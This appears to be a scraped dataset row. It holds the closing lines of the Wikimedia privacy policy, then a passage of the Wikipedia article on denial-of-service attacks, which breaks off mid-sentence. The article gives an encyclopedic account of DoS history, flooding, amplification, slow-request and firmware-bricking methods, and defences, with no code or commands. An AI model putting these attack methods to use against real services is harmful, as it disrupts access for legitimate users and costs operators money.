public comment period of at least 30 days. Because things naturally change over time and we want to ensure our Privacy Policy accurately reflects our practices and the law, it may be necessary to modify this Privacy Policy from time to time. We reserve the right to do so in the following manner: We ask that you please review the most up-to-date version of our Privacy Policy. Your continued use of the Wikimedia Sites after any effective date of a subsequent version of this Privacy Policy constitutes acceptance of this Privacy Policy on your part. If you have questions or suggestions about this Privacy Policy, or the information collected under this Privacy Policy, please email us at privacy wikimedia.org or contact us directly. If you are located in the European Economic Area and have questions about your personal data or would like to request to access, update, or delete it, you may contact our representative via email at EUrepresentative.Wikimedia twobirds.com, or via mail at: If you are an individual located in the United Kingdom, and have questions about your personal data or would like to request to access, update, or delete it, you may contact our representative via email at UKrepresentative.Wikimedia twobirds.com, or via mail at: Our European Economic Area and United Kingdom Representative can only be contacted for queries in relation to data protection. Depending on your jurisdiction, you also may have the right to lodge a complaint with a supervisory authority competent for your country or region. Thank you for reading our Privacy Policy. We hope you enjoy using the Wikimedia Sites and appreciate your participation in creating, maintaining, and constantly working to improve the largest repository of free knowledge in the world. Please note that in the event of any differences in meaning or interpretation between the original English version of this Privacy Policy and a translation, the original English version takes precedence. This version was approved by Amanda Keton on June 7, 2021, pursuant to the Delegation of policy-making authority by the Board, and went into effect on June 25, 2021. Previous versions can be found below: |
267 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Denial-of-service_attack | In computing, a denial-of-service attack (DoS attack) is a cyber-attack in which the perpetrator seeks to make a machine or network resource unavailable to its intended users by temporarily or indefinitely disrupting services of a host connected to a network. Denial of service is typically accomplished by flooding the targeted machine or resource with superfluous requests in an attempt to overload systems and prevent some or all legitimate requests from being fulfilled. 1 The range of attacks varies widely, spanning from inundating a server with millions of requests to slow its performance, overwhelming a server with a substantial amount of invalid data, to submitting requests with an illegitimate IP address. 2 In a distributed denial-of-service attack (DDoS attack), the incoming traffic flooding the victim originates from many different sources. More sophisticated strategies are required to mitigate this type of attack; simply attempting to block a single source is insufficient as there are multiple sources. 3 A DoS or DDoS attack is analogous to a group of people crowding the entry door of a shop, making it hard for legitimate customers to enter, thus disrupting trade and losing the business money. Criminal perpetrators of DoS attacks often target sites or services hosted on high-profile web servers such as banks or credit card payment gateways. Revenge and blackmail, 4 5 6 as well as hacktivism, 7 can motivate these attacks. Panix, the third-oldest ISP in the world, was the target of what is thought to be the first DoS attack. On September 6, 1996, Panix was subject to a SYN flood attack, which brought down its services for several days while hardware vendors, notably Cisco, figured out a proper defense. 8 Another early demonstration of the DoS attack was made by Khan C. Smith in 1997 during a DEF CON event, disrupting Internet access to the Las Vegas Strip for over an hour. The release of sample code during the event led to the online attack of Sprint, EarthLink, E-Trade and other major corporations in the year to follow. 9 The largest DDoS attack to date happened in September 2017, when Google Cloud experienced an attack with a peak volume of 2.54 Tb s, revealed by Google on October 17, 2020. 10 The record holder was thought to be an attack executed by an unnamed customer of the US-based service provider Arbor Networks, reaching a peak of about 1.7 Tb s. 11 In February 2020, Amazon Web Services experienced an attack with a peak volume of 2.3 Tb s. 12 In July 2021, CDN Provider Cloudflare boasted of protecting its client from a DDoS attack from a global Mirai botnet that was up to 17.2 million requests per second. 13 Russian DDoS prevention provider Yandex said it blocked a HTTP pipelining DDoS attack on Sept. 5. 2021 that originated from unpatched Mikrotik networking gear. 14 In the first half of 2022, the Russian invasion of Ukraine significantly shaped the cyberthreat landscape, with an increase in cyberattacks attributed to both state-sponsored actors and global hacktivist activities. The most notable event was a DDoS attack in February, the largest Ukraine has encountered, disrupting government and financial sector services. This wave of cyber aggression extended to Western allies like the UK, the US, and Germany. Particularly, the UK's financial sector saw an increase in DDoS attacks from nation-state actors and hacktivists, aimed at undermining Ukraine's allies. 15 In February 2023, Cloudflare faced a 71 million requests per second attack which Cloudflare claims was the largest HTTP DDoS attack at the time. 16 HTTP DDoS attacks are measured by HTTP requests per second instead of packets per second or bits per second. On July 10, 2023, the fanfiction platform Archive of Our Own (AO3) faced DDoS attacks, disrupting services. Anonymous Sudan, claiming the attack for religious and political reasons, was viewed skeptically by AO3 and experts. Flashpoint, a threat intelligence vendor, noted the group's past activities but doubted their stated motives. AO3, supported by the non-profit Organization for Transformative Works (OTW) and reliant on donations, is unlikely to meet the $30,000 Bitcoin ransom. 17 18 In August 2023, the group of hacktivists NoName057 targeted several Italian financial institutions, through the execution of slow DoS attacks. 19 On 14 January 2024, they executed a DDoS attack on Swiss federal websites, prompted by President Zelensky's attendance at the Davos World Economic Forum. Switzerland's National Cyber Security Centre quickly mitigated the attack, ensuring core federal services remained secure, despite temporary accessibility issues on some websites. 20 In October 2023, exploitation of a new vulnerability in the HTTP 2 protocol resulted in the record for largest HTTP DDoS attack being broken twice, once with a 201 million requests per second attack observed by Cloudflare, 21 and again with a 398 million requests per second attack observed by Google. 22 Denial-of-service attacks are characterized by an explicit attempt by attackers to prevent legitimate use of a service. There are two general forms of DoS attacks: those that crash services and those that flood services. The most serious attacks are distributed. 23 A distributed denial-of-service (DDoS) attack occurs when multiple systems flood the bandwidth or resources of a targeted system, usually one or more web servers. 23 A DDoS attack uses more than one unique IP address or machines, often from thousands of hosts infected with malware. 24 25 A distributed denial of service attack typically involves more than around 3 5 nodes on different networks; fewer nodes may qualify as a DoS attack but is not a DDoS attack. 26 27 Multiple attack machines can generate more attack traffic than a single machine and are harder to disable, and the behavior of each attack machine can be stealthier, making the attack harder to track and shut down. Since the incoming traffic flooding the victim originates from different sources, it may be impossible to stop the attack simply by using ingress filtering. It also makes it difficult to distinguish legitimate user traffic from attack traffic when spread across multiple points of origin. As an alternative or augmentation of a DDoS, attacks may involve forging of IP sender addresses (IP address spoofing) further complicating identifying and defeating the attack. These attacker advantages cause challenges for defense mechanisms. For example, merely purchasing more incoming bandwidth than the current volume of the attack might not help, because the attacker might be able to simply add more attack machines. citation needed The scale of DDoS attacks has continued to rise over recent years, by 2016 exceeding a terabit per second. 28 29 Some common examples of DDoS attacks are UDP flooding, SYN flooding and DNS amplification. 30 31 A yo-yo attack is a specific type of DoS DDoS aimed at cloud-hosted applications which use autoscaling. 32 33 34 The attacker generates a flood of traffic until a cloud-hosted service scales outwards to handle the increase of traffic, then halts the attack, leaving the victim with over-provisioned resources. When the victim scales back down, the attack resumes, causing resources to scale back up again. This can result in a reduced quality of service during the periods of scaling up and down and a financial drain on resources during periods of over-provisioning while operating with a lower cost for an attacker compared to a normal DDoS attack, as it only needs to be generating traffic for a portion of the attack period. An application layer DDoS attack (sometimes referred to as layer 7 DDoS attack) is a form of DDoS attack where attackers target application-layer processes. 35 26 The attack over-exercises specific functions or features of a website with the intention to disable those functions or features. This application-layer attack is different from an entire network attack, and is often used against financial institutions to distract IT and security personnel from security breaches. 36 In 2013, application-layer DDoS attacks represented 20% of all DDoS attacks. 37 According to research by Akamai Technologies, there have been "51 percent more application layer attacks" from Q4 2013 to Q4 2014 and "16 percent more" from Q3 2014 to Q4 2014. 38 In November 2017; Junade Ali, an engineer at Cloudflare noted that whilst network-level attacks continue to be of high capacity, they were occurring less frequently. Ali further noted that although network-level attacks were becoming less frequent, data from Cloudflare demonstrated that application-layer attacks were still showing no sign of slowing down. 39 The OSI model (ISO IEC 7498 1) is a conceptual model that characterizes and standardizes the internal functions of a communication system by partitioning it into abstraction layers. The model is a product of the Open Systems Interconnection project at the International Organization for Standardization (ISO). The model groups similar communication functions into one of seven logical layers. A layer serves the layer above it and is served by the layer below it. For example, a layer that provides error-free communications across a network provides the communications path needed by applications above it, while it calls the next lower layer to send and receive packets that traverse that path. In the OSI model, the definition of its application layer is narrower in scope than is often implemented. The OSI model defines the application layer as being the user interface. The OSI application layer is responsible for displaying data and images to the user in a human-recognizable format and to interface with the presentation layer below it. In an implementation, the application and presentation layers are frequently combined. The simplest DoS attack relies primarily on brute force, flooding the target with an overwhelming flux of packets, oversaturating its connection bandwidth or depleting the target's system resources. Bandwidth-saturating floods rely on the attacker's ability to generate the overwhelming flux of packets. A common way of achieving this today is via distributed denial-of-service, employing a botnet. An application layer DDoS attack is done mainly for specific targeted purposes, including disrupting transactions and access to databases. It requires fewer resources than network layer attacks but often accompanies them. 40 An attack may be disguised to look like legitimate traffic, except it targets specific application packets or functions. The attack on the application layer can disrupt services such as the retrieval of information or search functions on a website. 37 An advanced persistent DoS (APDoS) is associated with an advanced persistent threat and requires specialized DDoS mitigation. 41 These attacks can persist for weeks; the longest continuous period noted so far lasted 38 days. This attack involved approximately 50 petabits (50,000 terabits) of malicious traffic. 42 Attackers in this scenario may tactically switch between several targets to create a diversion to evade defensive DDoS countermeasures but all the while eventually concentrating the main thrust of the attack onto a single victim. In this scenario, attackers with continuous access to several very powerful network resources are capable of sustaining a prolonged campaign generating enormous levels of unamplified DDoS traffic. APDoS attacks are characterized by: Some vendors provide so-called booter or stresser services, which have simple web-based front ends, and accept payment over the web. Marketed and promoted as stress-testing tools, they can be used to perform unauthorized denial-of-service attacks, and allow technically unsophisticated attackers access to sophisticated attack tools. 44 Usually powered by a botnet, the traffic produced by a consumer stresser can range anywhere from 5 50 Gbit s, which can, in most cases, deny the average home user internet access. 45 A Markov-modulated denial-of-service attack occurs when the attacker disrupts control packets using a hidden Markov model. A setting in which Markov-model based attacks are prevalent is online gaming as the disruption of the control packet undermines game play and system functionality. 46 The United States Computer Emergency Readiness Team (US-CERT) has identified symptoms of a denial-of-service attack to include: 47 In cases such as MyDoom and Slowloris, the tools are embedded in malware and launch their attacks without the knowledge of the system owner. Stacheldraht is a classic example of a DDoS tool. It uses a layered structure where the attacker uses a client program to connect to handlers which are compromised systems that issue commands to the zombie agents which in turn facilitate the DDoS attack. Agents are compromised via the handlers by the attacker using automated routines to exploit vulnerabilities in programs that accept remote connections running on the targeted remote hosts. Each handler can control up to a thousand agents. 48 In other cases a machine may become part of a DDoS attack with the owner's consent, for example, in Operation Payback organized by the group Anonymous. The Low Orbit Ion Cannon has typically been used in this way. Along with High Orbit Ion Cannon a wide variety of DDoS tools are available today, including paid and free versions, with different features available. There is an underground market for these in hacker-related forums and IRC channels. Application-layer attacks employ DoS-causing exploits and can cause server-running software to fill the disk space or consume all available memory or CPU time. Attacks may use specific packet types or connection requests to saturate finite resources by, for example, occupying the maximum number of open connections or filling the victim's disk space with logs. An attacker with shell-level access to a victim's computer may slow it until it is unusable or crash it by using a fork bomb. Another kind of application-level DoS attack is XDoS (or XML DoS) which can be controlled by modern web application firewalls (WAFs). All attacks belonging to the category of timeout exploiting. 49 Slow DoS attacks implement an application-layer attack. Examples of threats are Slowloris, establishing pending connections with the victim, or SlowDroid, an attack running on mobile devices. Another target of DDoS attacks may be to produce added costs for the application operator, when the latter uses resources based on cloud computing. In this case, normally application-used resources are tied to a needed quality of service (QoS) level (e.g. responses should be less than 200 ms) and this rule is usually linked to automated software (e.g. Amazon CloudWatch 50 ) to raise more virtual resources from the provider to meet the defined QoS levels for the increased requests. The main incentive behind such attacks may be to drive the application owner to raise the elasticity levels to handle the increased application traffic, to cause financial losses, or force them to become less competitive. A banana attack is another particular type of DoS. It involves redirecting outgoing messages from the client back onto the client, preventing outside access, as well as flooding the client with the sent packets. A LAND attack is of this type. Pulsing zombies are compromised computers that are directed to launch intermittent and short-lived floodings of victim websites with the intent of merely slowing it rather than crashing it. This type of attack, referred to as degradation-of-service, can be more difficult to detect and can disrupt and hamper connection to websites for prolonged periods of time, potentially causing more overall disruption than a denial-of-service attack. 51 52 Exposure of degradation-of-service attacks is complicated further by the matter of discerning whether the server is really being attacked or is experiencing higher than normal legitimate traffic loads. 53 If an attacker mounts an attack from a single host, it would be classified as a DoS attack. Any attack against availability would be classed as a denial-of-service attack. On the other hand, if an attacker uses many systems to simultaneously launch attacks against a remote host, this would be classified as a DDoS attack. Malware can carry DDoS attack mechanisms; one of the better-known examples of this was MyDoom. Its DoS mechanism was triggered on a specific date and time. This type of DDoS involved hardcoding the target IP address before releasing the malware and no further interaction was necessary to launch the attack. A system may also be compromised with a trojan containing a zombie agent. Attackers can also break into systems using automated tools that exploit flaws in programs that listen for connections from remote hosts. This scenario primarily concerns systems acting as servers on the web. Stacheldraht is a classic example of a DDoS tool. It uses a layered structure where the attacker uses a client program to connect to handlers, which are compromised systems that issue commands to the zombie agents, which in turn facilitate the DDoS attack. Agents are compromised via the handlers by the attacker. Each handler can control up to a thousand agents. 48 In some cases a machine may become part of a DDoS attack with the owner's consent, for example, in Operation Payback, organized by the group Anonymous. These attacks can use different types of internet packets such as TCP, UDP, ICMP, etc. These collections of compromised systems are known as botnets. DDoS tools like Stacheldraht still use classic DoS attack methods centered on IP spoofing and amplification like smurf attacks and fraggle attacks (types of bandwidth consumption attacks). SYN floods (a resource starvation attack) may also be used. Newer tools can use DNS servers for DoS purposes. Unlike MyDoom's DDoS mechanism, botnets can be turned against any IP address. Script kiddies use them to deny the availability of well known websites to legitimate users. 54 More sophisticated attackers use DDoS tools for the purposes of extortion including against their business rivals. 55 It has been reported that there are new attacks from internet of things (IoT) devices that have been involved in denial of service attacks. 56 In one noted attack that was made peaked at around 20,000 requests per second which came from around 900 CCTV cameras. 57 UK's GCHQ has tools built for DDoS, named PREDATORS FACE and ROLLING THUNDER. 58 Simple attacks such as SYN floods may appear with a wide range of source IP addresses, giving the appearance of a distributed DoS. These flood attacks do not require completion of the TCP three-way handshake and attempt to exhaust the destination SYN queue or the server bandwidth. Because the source IP addresses can be trivially spoofed, an attack could come from a limited set of sources, or may even originate from a single host. Stack enhancements such as SYN cookies may be effective mitigation against SYN queue flooding but do not address bandwidth exhaustion. In 2022, TCP attacks were the leading method in DDoS incidents, accounting for 63% of all DDoS activity. This includes tactics like TCP SYN, TCP ACK, and TCP floods. With TCP being the most widespread networking protocol, its attacks are expected to remain prevalent in the DDoS threat scene. 15 In 2015, DDoS botnets such as DD4BC grew in prominence, taking aim at financial institutions. 59 Cyber-extortionists typically begin with a low-level attack and a warning that a larger attack will be carried out if a ransom is not paid in bitcoin. 60 Security experts recommend targeted websites to not pay the ransom. The attackers tend to get into an extended extortion scheme once they recognize that the target is ready to pay. 61 First discovered in 2009, the HTTP slow POST attack sends a complete, legitimate HTTP POST header, which includes a Content-Length field to specify the size of the message body to follow. However, the attacker then proceeds to send the actual message body at an extremely slow rate (e.g. 1 byte 110 seconds). Due to the entire message being correct and complete, the target server will attempt to obey the Content-Length field in the header, and wait for the entire body of the message to be transmitted, which can take a very long time. The attacker establishes hundreds or even thousands of such connections until all resources for incoming connections on the victim server are exhausted, making any further connections impossible until all data has been sent. It is notable that unlike many other DDoS or DDoS attacks, which try to subdue the server by overloading its network or CPU, an HTTP slow POST attack targets the logical resources of the victim, which means the victim would still have enough network bandwidth and processing power to operate. 62 Combined with the fact that the Apache HTTP Server will, by default, accept requests up to 2GB in size, this attack can be particularly powerful. HTTP slow POST attacks are difficult to differentiate from legitimate connections and are therefore able to bypass some protection systems. OWASP, an open source web application security project, released a tool to test the security of servers against this type of attack. 63 A Challenge Collapsar (CC) attack is an attack where standard HTTP requests are sent to a targeted web server frequently. The Uniform Resource Identifiers (URIs) in the requests require complicated time-consuming algorithms or database operations which may exhaust the resources of the targeted web server. 64 65 66 In 2004, a Chinese hacker nicknamed KiKi invented a hacking tool to send these kinds of requests to attack a NSFOCUS firewall named Collapsar, and thus the hacking tool was known as Challenge Collapsar, or CC for short. Consequently, this type of attack got the name CC attack. 67 A smurf attack relies on misconfigured network devices that allow packets to be sent to all computer hosts on a particular network via the broadcast address of the network, rather than a specific machine. The attacker will send large numbers of IP packets with the source address faked to appear to be the address of the victim. 68 Most devices on a network will, by default, respond to this by sending a reply to the source IP address. If the number of machines on the network that receive and respond to these packets is very large, the victim's computer will be flooded with traffic. This overloads the victim's computer and can even make it unusable during such an attack. 69 Ping flood is based on sending the victim an overwhelming number of ping packets, usually using the ping command from Unix-like hosts. a It is very simple to launch, the primary requirement being access to greater bandwidth than the victim. Ping of death is based on sending the victim a malformed ping packet, which will lead to a system crash on a vulnerable system. The BlackNurse attack is an example of an attack taking advantage of the required Destination Port Unreachable ICMP packets. A nuke is an old-fashioned denial-of-service attack against computer networks consisting of fragmented or otherwise invalid ICMP packets sent to the target, achieved by using a modified ping utility to repeatedly send this corrupt data, thus slowing down the affected computer until it comes to a complete stop. 70 A specific example of a nuke attack that gained some prominence is the WinNuke, which exploited the vulnerability in the NetBIOS handler in Windows 95. A string of out-of-band data was sent to TCP port 139 of the victim's machine, causing it to lock up and display a Blue Screen of Death. 70 Attackers have found a way to exploit a number of bugs in peer-to-peer servers to initiate DDoS attacks. The most aggressive of these peer-to-peer-DDoS attacks exploits DC . With peer-to-peer there is no botnet and the attacker does not have to communicate with the clients it subverts. Instead, the attacker acts as a puppet master, instructing clients of large peer-to-peer file sharing hubs to disconnect from their peer-to-peer network and to connect to the victim's website instead. 71 72 73 Permanent denial-of-service (PDoS), also known loosely as phlashing, 74 is an attack that damages a system so badly that it requires replacement or reinstallation of hardware. 75 Unlike the distributed denial-of-service attack, a PDoS attack exploits security flaws which allow remote administration on the management interfaces of the victim's hardware, such as routers, printers, or other networking hardware. The attacker uses these vulnerabilities to replace a device's firmware with a modified, corrupt, or defective firmware image—a process which when done legitimately is known as flashing. The intent is to brick the device, rendering it unusable for its original purpose until it can be repaired or replaced. The PDoS is a pure hardware-targeted attack that can be much faster and requires fewer resources than using a botnet in a DDoS attack. Because of these features, and the potential and high probability of security exploits on network-enabled embedded devices, this technique has come to the attention of numerous hacking communities. BrickerBot, a piece of malware that targeted IoT devices, used PDoS attacks to disable its targets. 76 PhlashDance is a tool created by Rich Smith (an employee of Hewlett-Packard's Systems Security Lab) used to detect and demonstrate PDoS vulnerabilities at the 2008 EUSecWest Applied Security Conference in London, UK. 77 A distributed denial-of-service attack may involve sending forged requests of some type to a very large number of computers that will reply to the requests. Using Internet Protocol address spoofing, the source address is set to that of the targeted victim, which means all the replies will go to (and flood) the target. This reflected attack form is sometimes called a distributed reflective denial-of-service (DRDoS) attack. 78 ICMP echo request attacks (Smurf attacks) can be considered one form of reflected attack, as the flooding hosts send Echo Requests to the broadcast addresses of mis-configured networks, thereby enticing hosts to send Echo Reply packets to the victim. Some early DDoS programs implemented a distributed form of this attack. Amplification attacks are used to magnify the bandwidth that is sent to a victim. Many services can be exploited to act as reflectors, some harder to block than others. 79 US-CERT have observed that different services may result in different amplification factors, as tabulated below: 80 DNS amplification attacks involves an attacker sending a DNS name lookup request to one or more public DNS servers, spoofing the source IP address of the targeted victim. The attacker tries to request as much information as possible, thus amplifying the DNS response that is sent to the targeted victim. Since the size of the request is significantly smaller than the response, the attacker is easily able to increase the amount of traffic directed at the target. 86 87 SNMP and NTP can also be exploited as reflectors in an amplification attack. An example of an amplified DDoS attack through the Network Time Protocol (NTP) is through a command called monlist, which sends the details of the last 600 hosts that have requested the time from the NTP server back to the requester. A small request to this time server can be sent using a spoofed source IP address of some victim, which results in a response 556.9 times the size of the request being sent to the victim. This becomes amplified when using botnets that all send requests with the same spoofed IP source, which will result in a massive amount of data being sent back to the victim. It is very difficult to defend against these types of attacks because the response data is coming from legitimate servers. These attack requests are also sent through UDP, which does not require a connection to the server. This means that the source IP is not verified when a request is received by the server. To bring awareness of these vulnerabilities, campaigns have been started that are dedicated to finding amplification vectors which have led to people fixing their resolvers or having the resolvers shut down completely. citation needed The Mirai botnet works by using a computer worm to infect hundreds of thousands of IoT devices across the internet. The worm propagates through networks and systems taking control of poorly protected IoT devices such as thermostats, Wi-Fi-enabled clocks, and washing machines. 88 The owner or user will usually have no immediate indication of when the device becomes infected. The IoT device itself is not the direct target of the attack, it is used as a part of a larger attack. 89 Once the hacker has enslaved the desired number of devices, they instruct the devices to try to contact an ISP. In October 2016, a Mirai botnet attacked Dyn which is the ISP for sites such as Twitter, Netflix, etc. 88 As soon as this occurred, these websites were all unreachable for several hours. RUDY attack targets web applications by starvation of available sessions on the web server. Much like Slowloris, RUDY keeps sessions at halt using never-ending POST transmissions and sending an arbitrarily large content-length header value. 90 Manipulating maximum segment size and selective acknowledgement (SACK) may be used by a remote peer to cause a denial of service by an integer overflow in the Linux kernel, potentially causing a Kernel panic. 91 Jonathan Looney discovered CVE 2019 11477, CVE 2019 11478, CVE 2019 11479 on June 17, 2019. 92 The shrew attack is a denial-of-service attack on the Transmission Control Protocol where the attacker employs man-in-the-middle techniques. It exploits a weakness in TCP's re-transmission timeout mechanism, using short synchronized bursts of traffic to disrupt TCP connections on the same link. 93 A slow read attack sends legitimate application layer requests, but reads responses very slowly, keeping connections open longer hoping to exhaust the server's connection pool. The slow read is achieved by advertising a very small number for the TCP Receive Window size, and at the same time emptying clients' TCP receive buffer slowly, which causes a very low data flow rate. 94 A sophisticated low-bandwidth DDoS attack is a form of DoS that uses less traffic and increases its effectiveness by aiming at a weak point in the victim's system design, i.e., the attacker sends traffic consisting of complicated requests to the system. 95 Essentially, a sophisticated DDoS attack is lower in cost due to its use of less traffic, is smaller in size making it more difficult to identify, and it has the ability to hurt systems which are protected by flow control mechanisms. 95 96 A SYN flood occurs when a host sends a flood of TCP SYN packets, often with a forged sender address. Each of these packets is handled like a connection request, causing the server to spawn a half-open connection, send back a TCP SYN-ACK packet, and wait for a packet in response from the sender address. However, because the sender's address is forged, the response never comes. These half-open connections exhaust the available connections the server can make, keeping it from responding to legitimate requests until after the attack ends. 97 A teardrop attack involves sending mangled IP fragments with overlapping, oversized payloads to the target machine. This can crash various operating systems because of a bug in their TCP IP fragmentation re-assembly code. 98 Windows 3.1x, Windows 95 and Windows NT operating systems, as well as versions of Linux prior to versions 2.0.32 and 2.1.63 are vulnerable to this attack. b One of the fields in an IP header is the fragment offset field, indicating the starting position, or offset, of the data contained in a fragmented packet relative to the data in the original packet. If the sum of the offset and size of one fragmented packet differs from that of the next fragmented packet, the packets overlap. When this happens, a server vulnerable to teardrop attacks is unable to reassemble the packets resulting in a denial-of-service condition. 101 Voice over IP has made abusive origination of large numbers of telephone voice calls inexpensive and easily automated while permitting call origins to be misrepresented through caller ID spoofing. According to the US Federal Bureau of Investigation, telephony denial-of-service (TDoS) has appeared as part of various fraudulent schemes: TDoS can exist even without Internet telephony. In the 2002 New Hampshire Senate election phone jamming scandal, telemarketers were used to flood political opponents with spurious calls to jam phone banks on election day. Widespread publication of a number can also flood it with enough calls to render it unusable, as happened by accident in 1981 with multiple 1 area code 867 5309 subscribers inundated by hundreds of calls daily in response to the song "867 5309 Jenny". TDoS differs from other telephone harassment (such as prank calls and obscene phone calls) by the number of calls originated. By occupying lines continuously with repeated automated calls, the victim is prevented from making or receiving both routine and emergency telephone calls. Related exploits include SMS flooding attacks and black fax or continuous fax transmission by using a loop of paper at the sender. It takes more router resources to drop a packet with a TTL value of 1 or less than it does to forward a packet with a higher TTL value. When a packet is dropped due to TTL expiry, the router CPU must generate and send an ICMP time exceeded response. Generating many of these responses can overload the router's CPU. 104 A UPnP attack uses an existing vulnerability in Universal Plug and Play (UPnP) protocol to get past network security and flood a target's network and servers. The attack is based on a DNS amplification technique, but the attack mechanism is a UPnP router that forwards requests from one outer source to another. The UPnP router returns the data on an unexpected UDP port from a bogus IP address, making it harder to take simple action to shut down the traffic flood. According to the Imperva researchers, the most effective way to stop this attack is for companies to lock down UPnP routers. 105 106 In 2014 it was discovered that Simple Service Discovery Protocol (SSDP) was being used in DDoS attacks known as an SSDP reflection attack with amplification. Many devices, including some residential routers, have a vulnerability in the UPnP software that allows an attacker to get replies from UDP port 1900 to a destination address of their choice. With a botnet of thousands of devices, the attackers can generate sufficient packet rates and occupy bandwidth to saturate links, causing the denial of services. 107 108 109 Because of this weakness, the network company Cloudflare has described SSDP as the "Stupidly Simple DDoS Protocol". 110 ARP spoofing is a common DoS attack that involves a vulnerability in the ARP protocol that allows an attacker to associate their MAC address to the IP address of another computer or gateway, causing traffic intended for the original authentic IP to be re-routed to that of the attacker, causing a denial of service. Defensive responses to denial-of-service attacks typically involve the use of a combination of attack detection, traffic classification and response tools, aiming to block traffic the tools identify as illegitimate and allow traffic that they identify as legitimate. 111 A list of response tools include the following. All traffic destined to the victim is diverted to pass through a cleaning center or a scrubbing center via various methods such as: changing the victim IP address in the DNS system, tunneling methods (GRE VRF, MPLS, SDN), 112 proxies, digital cross connects, or even direct circuits. The cleaning center separates bad traffic (DDoS and also other common internet attacks) and only passes good legitimate traffic to the victim server. 113 The victim needs central connectivity to the Internet to use this kind of service unless they happen to be located within the same facility as the cleaning center. DDoS attacks can overwhelm any type of hardware firewall, and passing malicious traffic through large and mature networks becomes more and more effective and economically sustainable against DDoS. 114 Application front-end hardware is intelligent hardware placed on the network before traffic reaches the servers. It can be used on networks in conjunction with routers and switches and as part of bandwidth management. Application front-end hardware analyzes data packets as they enter the network, and identifies and drops dangerous or suspicious flows. Approaches to detection of DDoS attacks against cloud-based applications may be based on an application layer analysis, indicating whether incoming bulk traffic is legitimate. 115 These approaches mainly rely on an identified path of value inside the application and monitor the progress of requests on this path, through markers called key completion indicators. 116 In essence, these techniques are statistical methods of assessing the behavior of incoming requests to detect if something unusual or abnormal is going on. An analogy is to a brick-and-mortar department store where customers spend, on average, a known percentage of their time on different activities such as picking up items and examining them, putting them back, filling a basket, waiting to pay, paying, and leaving. If a mob of customers arrived in the store and spent all their time picking up items and putting them back, but never made any purchases, this could be flagged as unusual behavior. With blackhole routing, all the traffic to the attacked DNS or IP address is sent to a black hole (null interface or a non-existent server). To be more efficient and avoid affecting network connectivity, it can be managed by the ISP. 117 A DNS sinkhole routes traffic to a valid IP address which analyzes traffic and rejects bad packets. Sinkholing may not be efficient for severe attacks. Intrusion prevention systems (IPS) are effective if the attacks have signatures associated with them. However, the trend among attacks is to have legitimate content but bad intent. Intrusion-prevention systems that work on content recognition cannot block behavior-based DoS attacks. 41 An ASIC based IPS may detect and block denial-of-service attacks because they have the processing power and the granularity to analyze the attacks and act like a circuit breaker in an automated way. 41 More focused on the problem than IPS, a DoS defense system (DDS) can block connection-based DoS attacks and those with legitimate content but bad intent. A DDS can also address both protocol attacks (such as teardrop and ping of death) and rate-based attacks (such as ICMP floods and SYN floods). DDS has a purpose-built system that can easily identify and obstruct denial of service attacks at a greater speed than a software-based system. 118 In the case of a simple attack, a firewall can be adjusted to deny all incoming traffic from the attackers, based on protocols, ports, or the originating IP addresses. More complex attacks will however be hard to block with simple rules: for example, if there is an ongoing attack on port 80 (web service), it is not possible to drop all incoming traffic on this port because doing so will prevent the server from receiving and serving legitimate traffic. 119 Additionally, firewalls may be too deep in the network hierarchy, with routers being adversely affected before the traffic gets to the firewall. Also, many security tools still do not support IPv6 or may not be configured properly, so the firewalls may be bypassed during the attacks. 120 Similar to switches, routers have some rate-limiting and ACL capabilities. They, too, are manually set. Most routers can be easily overwhelmed under a DoS attack. Nokia SR-OS using FP4 or FP5 processors offers DDoS protection. 121 Nokia SR-OS also uses big data analytics-based Nokia Deepfield Defender for DDoS protection. 122 Cisco IOS has optional features that can reduce the impact of flooding. 123 Most switches have some rate-limiting and ACL capability. Some switches provide automatic or system-wide rate limiting, traffic shaping, delayed binding (TCP splicing), deep packet inspection and bogon filtering (bogus IP filtering) to detect and remediate DoS attacks through automatic rate filtering and WAN Link failover and balancing. These schemes will work as long as the DoS attacks can be prevented by using them. For example, SYN flood can be prevented using delayed binding or TCP splicing. Similarly, content-based DoS may be prevented using deep packet inspection. Attacks using Martian packets can be prevented using bogon filtering. Automatic rate filtering can work as long as set rate thresholds have been set correctly. WAN-link failover will work as long as both links have a DoS prevention mechanism. 41 For example, in an SSDP reflection attack; the key mitigation is to block incoming UDP traffic on port 1900 at the firewall. 124 An unintentional denial-of-service can occur when a system ends up denied, not due to a deliberate attack by a single individual or group of individuals, but simply due to a sudden enormous spike in popularity. This can happen when an extremely popular website posts a prominent link to a second, less well-prepared site, for example, as part of a news story. The result is that a significant proportion of the primary site's regular users potentially hundreds of thousands of people click that link in the space of a few hours, having the same effect on the target website as a DDoS attack. A VIPDoS is the same, but specifically when the link was posted by a celebrity. When Michael Jackson died in 2009, websites such as Google and Twitter slowed down or even crashed. 125 Many sites' servers thought the requests were from a virus or spyware trying to cause a denial-of-service attack, warning users that their queries looked like "automated requests from a computer virus or spyware application". 126 News sites and link sites sites whose primary function is to provide links to interesting content elsewhere on the Internet are most likely to cause this phenomenon. The canonical example is the Slashdot effect when receiving traffic from Slashdot. It is also known as "the Reddit hug of death" and "the Digg effect". Routers have also been known to create unintentional DoS attacks, as both D-Link and Netgear routers have overloaded NTP servers by flooding them without respecting the restrictions of client types or geographical limitations. Similar unintentional denial-of-service can also occur via other media, e.g. when a URL is mentioned on television. If a server is being indexed by Google or another search engine during peak periods of activity, or does not have a lot of available bandwidth while being indexed, it can also experience the effects of a DoS attack. 41 failed verification citation needed Legal action has been taken in at least one such case. In 2006, Universal Tube Rollform Equipment Corporation sued YouTube: massive numbers of would-be YouTube.com users accidentally typed the tube company's URL, utube.com. As a result, the tube company ended up having to spend large amounts of money on upgrading its bandwidth. 127 The company appears to have taken advantage of the situation, with utube.com now containing ads for advertisement revenue. In March 2014, after Malaysia Airlines Flight 370 went missing, DigitalGlobe launched a crowdsourcing service on which users could help search for the missing jet in satellite images. The response overwhelmed the company's servers. 128 An unintentional denial-of-service may also result from a prescheduled event created by the website itself, as was the case of the Census in Australia in 2016. 129 This could be caused when a server provides some service at a specific time. In computer network security, backscatter is a side-effect of a spoofed denial-of-service attack. In this kind of attack, the attacker spoofs (or forges) the source address in IP packets sent to the victim. In general, the victim machine cannot distinguish between the spoofed packets and legitimate packets, so the victim responds to the spoofed packets as it normally would. These response packets are known as backscatter. 130 If the attacker is spoofing source addresses randomly, the backscatter response packets from the victim will be sent back to random destinations. This effect can be used by network telescopes as indirect evidence of such attacks. The term backscatter analysis refers to observing backscatter packets arriving at a statistically significant portion of the IP address space to determine the characteristics of 